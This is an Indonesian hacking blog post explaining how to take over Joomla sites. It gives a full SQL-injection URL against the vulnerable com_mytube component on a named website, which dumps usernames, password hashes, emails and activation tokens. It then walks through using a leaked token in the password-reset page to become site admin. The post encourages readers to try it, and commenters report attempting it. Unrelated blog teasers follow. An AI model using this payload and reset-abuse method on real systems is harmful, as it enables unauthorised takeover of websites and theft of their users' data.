Cracking Password Joomla

Ini adalah sebuah trik dengan memaksimalkan exploit dari component joomla yang vuln agar dapat masuk sebagai admin di situs berbasis cms joomla.
Mungkin kalian pernah bingung bagaimana cara crack hash joomla,, uda crack kesana kesini namun tidak mendapatkan hasil, berikut saya ada sedikit trik untuk mengakalinya. Yaitu dengan cara reset password dan memasukan token, token disini bukan tanda ' ya,, disini kita memaksimalkan exploit dari component joomla yang vuln.



misal anda menggunakan exploit com_mytube

http://www.malaysia-instinct.com/english/index.php?view=videos&type=member&user_id=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck

akan muncul username , password , email dan activation .
disini kita akan menggunakan email dan activation nya.
pertama buka halaman reset passwordnya dengan menambahkan index.php?option=com_user&view=reset

http://www.malaysia-instinct.com/english/index.php?option=com_user&view=reset

masukan email admin nyah...

setelah itu refresh halaman yang memunculkan username password dll ( http://www.malaysia-instinct.com/english/index.php?view=videos&type=member&user_id=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck )

maka akan muncul activation atau tokennya...

kemudian balik ke halaman yang dimana kita disuruh memasukan token atau activation, masukan activation yang kita dapat dr hasil exploit td.

kemudian isi password baru...

login sebagai admin... selamat anda telah menjadi admin site tersebut...

sebagian sudah di patch agar tidak bisa reset, namun masih banyak yang bisa untuk di reset..selamat mencoba... happy hackin`....

use at your own risk....semoga bermanfaat...

--==[ r3m1ck ]==--
INDONESIANCODER

Komentar

  1. LolidsOfficialBlog21 Maret 2010 pukul 04.46

    he..he.. Pertamax Cuy...i..i....
    akhirnya mendapat ilham dr sholat subuh ^^
    thx mas r3m1ck.... nice tut.

    regards,

    LOL1ds_IHT

    BalasHapus
  2. Admin21 Maret 2010 pukul 14.57

    Sama2... semoga bermanfaat ^ ^

    BalasHapus
  3. Anonim15 Juli 2010 pukul 01.49

    nyari imel adminnya gimana bos...

    BalasHapus
  4. eman29 Oktober 2010 pukul 10.34

    kk aku kok token nya vailid terus?

    BalasHapus

Posting Komentar

Silahkan tinggalkan komentar anda di sini...
makasih ya uda kasih komentar...
sering - sering maen sini ya...
No SaRa, No PoLiTiCs, No SPaMMiNG!!!

Postingan populer dari blog ini

PEDOMAN DAN INSTRUMEN PENILAIAN KINERJA KEPALA SEKOLAH

PEDOMAN DAN INSTRUMEN PENILAIAN KINERJA KEPALA SEKOLAH DI LINGKUNGAN PEMERINTAH KABUPATEN KEBUMEN I. PENDAHULUAN A. DASAR 1. Undang-Undang Nomor 43 Tahun 1999 tentang Perubahan Atas Undang-Undang Nomor 8 Tahun 1974 tentang Pokok Pokok Kepegawaian ; 2. Undang-Undang Nomor 20 Tahun 2003 Tentang Sistem Pendidikan Nasional; 3. Undang-Undang Nomor 10 Tahun 2004 Tentang Pembentukan Peraturan Perundang-undangan; 4. Undang-Undang Nomor 32 Tahun 2004 Tentang Pemerintahan Daerah. 5. Keputusan Menteri Pendidikan Nasional Nomor 162/U/2003 tentang Pedoman Penugasan Guru sebagai Kepala Sekolah. 6. Rambu-rambu penilaian Kinerja Sekolah oleh Direktur Jenderal Pendidikan Dasar dan Menengah tanggal 15 Oktober 1999. 7. Rambu-rambu Penilaian Kinerja Sekolah oleh Direktur Jenderal Pendidikan Dasar dan Menengah tanggal 1 September 2000. 8. Keputusan Bupati Kebumen Nomor ..... Tahun 2006 tentang Penugasan Guru Pegawai Negeri Sipil yang diberi tugas tambahan sebagai Kepala Sekolah di Lingkungan Peme...
Baca selengkapnya

Domain ku baru,,

Sebenarnya sudah lama pengen share kabar ini tapi selalu aja disibukkan dengan kegiatan kampus dan forum makanya baru sempat share kabar ini sekarang :D ,, Jadi gini setelah kemarin hostingku di remaja host kena suspend, entah apa alasan mereka mensuspend hosting ku,, kwkwkwk.... terus r3m1ck.uni.cc ikut-ikutan ngga bisa di akses panel domainnya buat mindah name servernya,, setelah sekian lama r3m1ck ngga punya rumah akhirnya ada teman r3m1ck yang menawarkan domain dot us. akhirnya r3m1ck terima tawaran teman r3m1ck tersebut . Sekarang rumah r3m1ck sudah baru ,, r3m1ck.us ... main ya kawan-kawan ku.... maap web orang cupu jadi tampilannya jelek gitu,, thx for om bobyhikaru untuk hostingnya ^ ^ :D ,, thx for om bumble_be untuk domain dot us nya.... :D thx all to my friends...
Baca selengkapnya

My Luggage Recommendations

Gambar
Next week my father is an agenda for teaching in Gorontalo, Gorontalo is a city on Sulawesi island.  many preparations to be prepared.  such as toiletries, some clothes and do not forget the suitcase to carry all the equipment.  Initially I was confused to find the trunk where but after surfing the internet I found a luggage store site.  in the trunk was the site I can choose different types of baggage.  starting from the trunk of the Hartman luggage , a model from the Tumi luggage or luggage from Rimowa luggage  model.   Each model has a unique baggage.  Some examples of the Hartmann luggage is Wings Luggage Hartman Luggage, Hartmann Luggage Intensity, Tweed Hartmann Luggage, Hartmann Luggage Stratum, Metropolitan Hartmann Luggage, Hartmann Luggage Metropolitan, Hartmann Luggage Vera Wang Signature Collection, Collection Nautralist Hartmann Luggage. Some examples of Rimowa luggage is Rimowa Rimowa Salsa Water, Rimowa Topas Aluminum, Rimowa Sa...
Baca selengkapnya